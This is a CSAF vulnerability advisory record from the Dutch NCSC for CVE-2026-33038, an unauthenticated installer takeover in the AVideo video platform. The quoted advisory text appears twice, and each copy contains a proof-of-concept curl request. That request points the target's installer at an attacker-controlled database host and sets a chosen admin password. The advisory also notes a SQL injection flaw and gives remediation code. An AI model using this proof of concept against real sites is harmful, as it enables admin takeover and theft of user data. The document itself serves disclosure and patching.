{
"document": {
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "en",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "National Cyber Security Centre",
"namespace": "https://www.ncsc.nl/"
},
"title": "CVE-2026-33038",
"tracking": {
"current_release_date": "2026-03-26T06:11:44.970155Z",
"generator": {
"date": "2026-02-17T15:00:00Z",
"engine": {
"name": "V.E.L.M.A",
"version": "1.7"
}
},
"id": "CVE-2026-33038",
"initial_release_date": "2026-03-17T21:00:14.085511Z",
"revision_history": [
{
"date": "2026-03-17T21:00:14.085511Z",
"number": "1",
"summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
},
{
"date": "2026-03-17T21:00:17.619104Z",
"number": "2",
"summary": "NCSC Score created."
},
{
"date": "2026-03-19T11:40:23.995215Z",
"number": "3",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
},
{
"date": "2026-03-20T18:25:33.259671Z",
"number": "4",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
},
{
"date": "2026-03-20T18:25:40.789373Z",
"number": "5",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-20T18:29:25.114576Z",
"number": "6",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
},
{
"date": "2026-03-20T18:29:28.411631Z",
"number": "7",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-20T18:39:05.989719Z",
"number": "8",
"summary": "Unknown change."
},
{
"date": "2026-03-20T21:41:43.565730Z",
"number": "9",
"summary": "References created (1)."
},
{
"date": "2026-03-20T21:59:11.704062Z",
"number": "10",
"summary": "Source connected.| CVE status created. (valid)| EPSS created."
},
{
"date": "2026-03-20T21:59:15.323097Z",
"number": "11",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-21T13:47:28.434173Z",
"number": "12",
"summary": "References removed (1)."
},
{
"date": "2026-03-22T00:51:54.783392Z",
"number": "13",
"summary": "References created (1)."
},
{
"date": "2026-03-22T11:24:56.848162Z",
"number": "14",
"summary": "References removed (1)."
},
{
"date": "2026-03-23T00:54:05.568695Z",
"number": "15",
"summary": "References created (1)."
},
{
"date": "2026-03-23T05:16:01.988335Z",
"number": "16",
"summary": "References removed (1)."
},
{
"date": "2026-03-24T02:12:04.237709Z",
"number": "17",
"summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
},
{
"date": "2026-03-24T02:12:06.221510Z",
"number": "18",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-24T20:56:28.910268Z",
"number": "19",
"summary": "References created (1)."
},
{
"date": "2026-03-24T20:56:31.891095Z",
"number": "20",
"summary": "NCSC Score updated."
}
],
"status": "interim",
"version": "20"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/<26.0",
"product": {
"name": "vers:unknown/<26.0",
"product_id": "CSAFPID-5874460",
"product_identification_helper": {
"cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
}
}
}
],
"category": "product_name",
"name": "AVideo"
}
],
"category": "vendor",
"name": "WWBN"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-33038",
"cwe": {
"id": "CWE-306",
"name": "Missing Authentication for Critical Function"
},
"notes": [
{
"category": "description",
"text": "## Summary\nThe `install/checkConfiguration.php` endpoint performs full application initialization — database setup, admin account creation, and configuration file write — from unauthenticated POST input. The only guard is checking whether `videos/configuration.php` already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access.\n\n## Affected Component\n- `install/checkConfiguration.php` — entire file (lines 1-273)\n\n## Description\n\n### No authentication or access restriction on installer endpoint\n\nThe `checkConfiguration.php` file performs the most privileged operations in the application — creating the database schema, the admin account, and the configuration file — with no authentication, no setup token, no CSRF protection, and no IP restriction. The sole guard is a file-existence check:\n\n```php\n// install/checkConfiguration.php — lines 2-5\nif (file_exists(\"../videos/configuration.php\")) {\n error_log(\"Can not create configuration again: \". json_encode($_SERVER));\n exit;\n}\n```\n\nIf `videos/configuration.php` does not exist (fresh deployment, container restart without persistent storage, re-deployment), the entire installer runs with attacker-controlled POST parameters.\n\n### Attacker-controlled database host eliminates credential guessing\n\nUnlike typical installer exposure vulnerabilities where the attacker must guess the target's database credentials, this endpoint allows the attacker to supply their own database host:\n\n```php\n// install/checkConfiguration.php — line 25\n$mysqli = @new mysqli($_POST['databaseHost'], $_POST['databaseUser'], $_POST['databasePass'], \"\", $_POST['databasePort']);\n```\n\nThe attacker can:\n1. Run their own MySQL server with the AVideo schema pre-loaded\n2. Set `databaseHost` to their server's IP\n3. The connection succeeds (attacker controls the DB)\n4. The configuration file is written pointing the application at the attacker's database permanently\n\n### Admin account creation with unsanitized input\n\nThe admin user is created with direct POST parameter concatenation into SQL:\n\n```php\n// install/checkConfiguration.php — line 120\n$sql = \"INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', '\"\n . $_POST['contactEmail'] . \"', '\" . md5($_POST['systemAdminPass']) . \"', now(), now(), true)\";\n```\n\nThis has two issues: (1) the attacker controls the admin password, and (2) `$_POST['contactEmail']` is directly concatenated into SQL without escaping (SQL injection).\n\n### Configuration file written with attacker-controlled values\n\nThe configuration file is written to disk with all attacker-supplied values embedded:\n\n```php\n// install/checkConfiguration.php — lines 238-247\n$videosDir = $_POST['systemRootPath'].'videos/';\n\nif(!is_dir($videosDir)){\n mkdir($videosDir, 0777, true);\n}\n\n$fp = fopen(\"{$videosDir}configuration.php\", \"wb\");\nfwrite($fp, $content);\nfclose($fp);\n```\n\nThe `$content` variable (built at lines 188-236) embeds `$_POST['databaseHost']`, `$_POST['databaseUser']`, `$_POST['databasePass']`, `$_POST['webSiteRootURL']`, `$_POST['systemRootPath']`, and `$_POST['salt']` directly into the PHP configuration file.\n\n### Inconsistent defense: CLI installer is protected, web endpoint is not\n\nThe CLI installer (`install/install.php`) properly restricts access:\n\n```php\n// install/install.php — lines 3-5\nif (!isCommandLineInterface()) {\n die('Command Line only');\n}\n```\n\nThe web endpoint (`checkConfiguration.php`) lacks any equivalent protection, creating an inconsistent defense pattern.\n\n### No web server protection on install directory\n\nThere is no `.htaccess` file in the `install/` directory. The root `.htaccess` does not block access to `install/`. The endpoint is directly accessible at `/install/checkConfiguration.php`.\n\n### Execution chain\n\n1. Attacker discovers an AVideo instance where `videos/configuration.php` does not exist (fresh or re-deployed)\n2. Attacker sends POST to `/install/checkConfiguration.php` with their own database host, admin password, and site configuration\n3. The script connects to the attacker's database (or the target's with guessed/default credentials)\n4. Tables are created, admin user is inserted with attacker's password\n5. `configuration.php` is written to disk, permanently configuring the application\n6. Attacker logs in as admin with full control over the application\n\n## Proof of Concept\n\n**Step 1:** Set up an attacker-controlled MySQL server with the AVideo schema:\n\n```bash\n# On attacker's server\nmysql -e \"CREATE DATABASE avideo;\"\nmysql avideo < database.sql # Use AVideo's own schema file\n```\n\n**Step 2:** Send the installation request to the target:\n\n```bash\ncurl -s -X POST https://TARGET/install/checkConfiguration.php \\\n -d 'systemRootPath=/var/www/html/AVideo/' \\\n -d 'databaseHost=ATTACKER_MYSQL_IP' \\\n -d 'databasePort=3306' \\\n -d 'databaseUser=attacker' \\\n -d 'databasePass=attacker_pass' \\\n -d 'databaseName=avideo' \\\n -d 'createTables=1' \\\n -d 'contactEmail=attacker@example.com' \\\n -d 'systemAdminPass=AttackerPass123!' \\\n -d 'webSiteTitle=Pwned' \\\n -d 'mainLanguage=en_US' \\\n -d 'webSiteRootURL=https://TARGET/'\n```\n\n**Step 3:** Log in as admin:\n\n```\nUsername: admin\nPassword: AttackerPass123!\n```\n\nThe attacker now has full administrative access. If using their own database, they control all application data.\n\n## Impact\n\n- **Full application takeover:** Attacker becomes the sole admin with complete control\n- **Persistent backdoor via configuration:** The `videos/configuration.php` file is written with attacker-controlled database credentials, ensuring persistent access even after the attack\n- **Data exfiltration:** If pointing to the attacker's database, all future user data (registrations, uploads, comments) flows to the attacker\n- **Remote code execution potential:** Admin access in AVideo enables file uploads and plugin management, which can lead to arbitrary PHP execution\n- **SQL injection bonus:** `$_POST['contactEmail']` on line 120 is directly concatenated into SQL, allowing additional database manipulation\n\n## Recommended Remediation\n\n### Option 1: Add a one-time setup token (preferred)\n\nGenerate a random setup token during deployment that must be provided to complete installation:\n\n```php\n// At the top of install/checkConfiguration.php, after the file_exists check:\n\n// Require a setup token that was generated during deployment\n$setupTokenFile = __DIR__ . '/../videos/.setup_token';\nif (!file_exists($setupTokenFile)) {\n $obj = new stdClass();\n $obj->error = \"Setup token file not found. Create videos/.setup_token with a random secret.\";\n header('Content-Type: application/json');\n echo json_encode($obj);\n exit;\n}\n\n$expectedToken = trim(file_get_contents($setupTokenFile));\nif (empty($_POST['setupToken']) || !hash_equals($expectedToken, $_POST['setupToken'])) {\n $obj = new stdClass();\n $obj->error = \"Invalid setup token.\";\n header('Content-Type: application/json');\n echo json_encode($obj);\n exit;\n}\n```\n\n### Option 2: Restrict installer to localhost/CLI only\n\nBlock web access to the installer entirely:\n\n```php\n// At the top of install/checkConfiguration.php, after the file_exists check:\nif (!isCommandLineInterface()) {\n $allowedIPs = ['127.0.0.1', '::1'];\n if (!in_array($_SERVER['REMOTE_ADDR'], $allowedIPs)) {\n header('Content-Type: application/json');\n echo json_encode(['error' => 'Installation is only allowed from localhost']);\n exit;\n }\n}\n```\n\nAdditionally, add an `.htaccess` file in the `install/` directory:\n\n```apache\n# install/.htaccess\n\n Require local\n\n```\n\n### Additional fixes needed\n\n1. **Parameterize SQL queries** on line 120 to prevent SQL injection:\n```php\n$stmt = $mysqli->prepare(\"INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', ?, ?, now(), now(), true)\");\n$hashedPass = md5($_POST['systemAdminPass']); // Also: upgrade from md5 to password_hash()\n$stmt->bind_param(\"ss\", $_POST['contactEmail'], $hashedPass);\n$stmt->execute();\n```\n\n2. **Upgrade password hashing** from `md5()` to `password_hash()` with `PASSWORD_BCRYPT` or `PASSWORD_ARGON2ID`.\n\n## Credit\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).",
"title": "github - https://github.com/advisories/GHSA-2f9h-23f7-8gcx"
},
{
"category": "description",
"text": "## Summary\nThe `install/checkConfiguration.php` endpoint performs full application initialization — database setup, admin account creation, and configuration file write — from unauthenticated POST input. The only guard is checking whether `videos/configuration.php` already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access.\n\n## Affected Component\n- `install/checkConfiguration.php` — entire file (lines 1-273)\n\n## Description\n\n### No authentication or access restriction on installer endpoint\n\nThe `checkConfiguration.php` file performs the most privileged operations in the application — creating the database schema, the admin account, and the configuration file — with no authentication, no setup token, no CSRF protection, and no IP restriction. The sole guard is a file-existence check:\n\n```php\n// install/checkConfiguration.php — lines 2-5\nif (file_exists(\"../videos/configuration.php\")) {\n error_log(\"Can not create configuration again: \". json_encode($_SERVER));\n exit;\n}\n```\n\nIf `videos/configuration.php` does not exist (fresh deployment, container restart without persistent storage, re-deployment), the entire installer runs with attacker-controlled POST parameters.\n\n### Attacker-controlled database host eliminates credential guessing\n\nUnlike typical installer exposure vulnerabilities where the attacker must guess the target's database credentials, this endpoint allows the attacker to supply their own database host:\n\n```php\n// install/checkConfiguration.php — line 25\n$mysqli = @new mysqli($_POST['databaseHost'], $_POST['databaseUser'], $_POST['databasePass'], \"\", $_POST['databasePort']);\n```\n\nThe attacker can:\n1. Run their own MySQL server with the AVideo schema pre-loaded\n2. Set `databaseHost` to their server's IP\n3. The connection succeeds (attacker controls the DB)\n4. The configuration file is written pointing the application at the attacker's database permanently\n\n### Admin account creation with unsanitized input\n\nThe admin user is created with direct POST parameter concatenation into SQL:\n\n```php\n// install/checkConfiguration.php — line 120\n$sql = \"INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', '\"\n . $_POST['contactEmail'] . \"', '\" . md5($_POST['systemAdminPass']) . \"', now(), now(), true)\";\n```\n\nThis has two issues: (1) the attacker controls the admin password, and (2) `$_POST['contactEmail']` is directly concatenated into SQL without escaping (SQL injection).\n\n### Configuration file written with attacker-controlled values\n\nThe configuration file is written to disk with all attacker-supplied values embedded:\n\n```php\n// install/checkConfiguration.php — lines 238-247\n$videosDir = $_POST['systemRootPath'].'videos/';\n\nif(!is_dir($videosDir)){\n mkdir($videosDir, 0777, true);\n}\n\n$fp = fopen(\"{$videosDir}configuration.php\", \"wb\");\nfwrite($fp, $content);\nfclose($fp);\n```\n\nThe `$content` variable (built at lines 188-236) embeds `$_POST['databaseHost']`, `$_POST['databaseUser']`, `$_POST['databasePass']`, `$_POST['webSiteRootURL']`, `$_POST['systemRootPath']`, and `$_POST['salt']` directly into the PHP configuration file.\n\n### Inconsistent defense: CLI installer is protected, web endpoint is not\n\nThe CLI installer (`install/install.php`) properly restricts access:\n\n```php\n// install/install.php — lines 3-5\nif (!isCommandLineInterface()) {\n die('Command Line only');\n}\n```\n\nThe web endpoint (`checkConfiguration.php`) lacks any equivalent protection, creating an inconsistent defense pattern.\n\n### No web server protection on install directory\n\nThere is no `.htaccess` file in the `install/` directory. The root `.htaccess` does not block access to `install/`. The endpoint is directly accessible at `/install/checkConfiguration.php`.\n\n### Execution chain\n\n1. Attacker discovers an AVideo instance where `videos/configuration.php` does not exist (fresh or re-deployed)\n2. Attacker sends POST to `/install/checkConfiguration.php` with their own database host, admin password, and site configuration\n3. The script connects to the attacker's database (or the target's with guessed/default credentials)\n4. Tables are created, admin user is inserted with attacker's password\n5. `configuration.php` is written to disk, permanently configuring the application\n6. Attacker logs in as admin with full control over the application\n\n## Proof of Concept\n\n**Step 1:** Set up an attacker-controlled MySQL server with the AVideo schema:\n\n```bash\n# On attacker's server\nmysql -e \"CREATE DATABASE avideo;\"\nmysql avideo < database.sql # Use AVideo's own schema file\n```\n\n**Step 2:** Send the installation request to the target:\n\n```bash\ncurl -s -X POST https://TARGET/install/checkConfiguration.php \\\n -d 'systemRootPath=/var/www/html/AVideo/' \\\n -d 'databaseHost=ATTACKER_MYSQL_IP' \\\n -d 'databasePort=3306' \\\n -d 'databaseUser=attacker' \\\n -d 'databasePass=attacker_pass' \\\n -d 'databaseName=avideo' \\\n -d 'createTables=1' \\\n -d 'contactEmail=attacker@example.com' \\\n -d 'systemAdminPass=AttackerPass123!' \\\n -d 'webSiteTitle=Pwned' \\\n -d 'mainLanguage=en_US' \\\n -d 'webSiteRootURL=https://TARGET/'\n```\n\n**Step 3:** Log in as admin:\n\n```\nUsername: admin\nPassword: AttackerPass123!\n```\n\nThe attacker now has full administrative access. If using their own database, they control all application data.\n\n## Impact\n\n- **Full application takeover:** Attacker becomes the sole admin with complete control\n- **Persistent backdoor via configuration:** The `videos/configuration.php` file is written with attacker-controlled database credentials, ensuring persistent access even after the attack\n- **Data exfiltration:** If pointing to the attacker's database, all future user data (registrations, uploads, comments) flows to the attacker\n- **Remote code execution potential:** Admin access in AVideo enables file uploads and plugin management, which can lead to arbitrary PHP execution\n- **SQL injection bonus:** `$_POST['contactEmail']` on line 120 is directly concatenated into SQL, allowing additional database manipulation\n\n## Recommended Remediation\n\n### Option 1: Add a one-time setup token (preferred)\n\nGenerate a random setup token during deployment that must be provided to complete installation:\n\n```php\n// At the top of install/checkConfiguration.php, after the file_exists check:\n\n// Require a setup token that was generated during deployment\n$setupTokenFile = __DIR__ . '/../videos/.setup_token';\nif (!file_exists($setupTokenFile)) {\n $obj = new stdClass();\n $obj->error = \"Setup token file not found. Create videos/.setup_token with a random secret.\";\n header('Content-Type: application/json');\n echo json_encode($obj);\n exit;\n}\n\n$expectedToken = trim(file_get_contents($setupTokenFile));\nif (empty($_POST['setupToken']) || !hash_equals($expectedToken, $_POST['setupToken'])) {\n $obj = new stdClass();\n $obj->error = \"Invalid setup token.\";\n header('Content-Type: application/json');\n echo json_encode($obj);\n exit;\n}\n```\n\n### Option 2: Restrict installer to localhost/CLI only\n\nBlock web access to the installer entirely:\n\n```php\n// At the top of install/checkConfiguration.php, after the file_exists check:\nif (!isCommandLineInterface()) {\n $allowedIPs = ['127.0.0.1', '::1'];\n if (!in_array($_SERVER['REMOTE_ADDR'], $allowedIPs)) {\n header('Content-Type: application/json');\n echo json_encode(['error' => 'Installation is only allowed from localhost']);\n exit;\n }\n}\n```\n\nAdditionally, add an `.htaccess` file in the `install/` directory:\n\n```apache\n# install/.htaccess\n\n Require local\n\n```\n\n### Additional fixes needed\n\n1. **Parameterize SQL queries** on line 120 to prevent SQL injection:\n```php\n$stmt = $mysqli->prepare(\"INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', ?, ?, now(), now(), true)\");\n$hashedPass = md5($_POST['systemAdminPass']); // Also: upgrade from md5 to password_hash()\n$stmt->bind_param(\"ss\", $_POST['contactEmail'], $hashedPass);\n$stmt->execute();\n```\n\n2. **Upgrade password hashing** from `md5()` to `password_hash()` with `PASSWORD_BCRYPT` or `PASSWORD_ARGON2ID`.\n\n## Credit\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).",
"title": "github - https://api.github.com/advisories/GHSA-2f9h-23f7-8gcx"
},
{
"category": "description",
"text": "WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0.",
"title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33038.json"
},
{
"category": "description",
"text": "WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0.",
"title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33038"
},
{
"category": "other",
"text": "0.0011",
"title": "EPSS"
},
{
"category": "other",
"text": "3.5",
"title": "NCSC Score"
},
{
"category": "other",
"text": "The value of the most recent EPSS score, Is related to (a version of) an uncommon product, There is exploit data available from source Nvd",
"title": "NCSC Score top decreasing factors"
}
],
"product_status": {
"known_affected": [
"CSAFPID-5874460"
]
},
"references": [
{
"category": "external",
"summary": "Source - github",
"url": "https://github.com/advisories/GHSA-2f9h-23f7-8gcx"
},
{
"category": "external",
"summary": "Source raw - github",
"url": "https://api.github.com/advisories/GHSA-2f9h-23f7-8gcx"
},
{
"category": "external",
"summary": "Source - github",
"url": "https://api.github.com/advisories/GHSA-2f9h-23f7-8gcx"
},
{
"category": "external",
"summary": "Source - cveprojectv5",
"url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33038.json"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33038"
},
{
"category": "external",
"summary": "Source - first",
"url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd",
"url": "https://github.com/WWBN/AVideo/commit/b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1"
},
{
"category": "external",
"summary": "Reference - github",
"url": "https://github.com/advisories/GHSA-2f9h-23f7-8gcx"
},
{
"category": "external",
"summary": "Reference - github",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33038"
}
],
"scores": [
{
"cvss_v3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"baseScore": 8.1,
"baseSeverity": "HIGH"
},
"products": [
"CSAFPID-5874460"
]
}
],
"title": "CVE-2026-33038"
}
]
}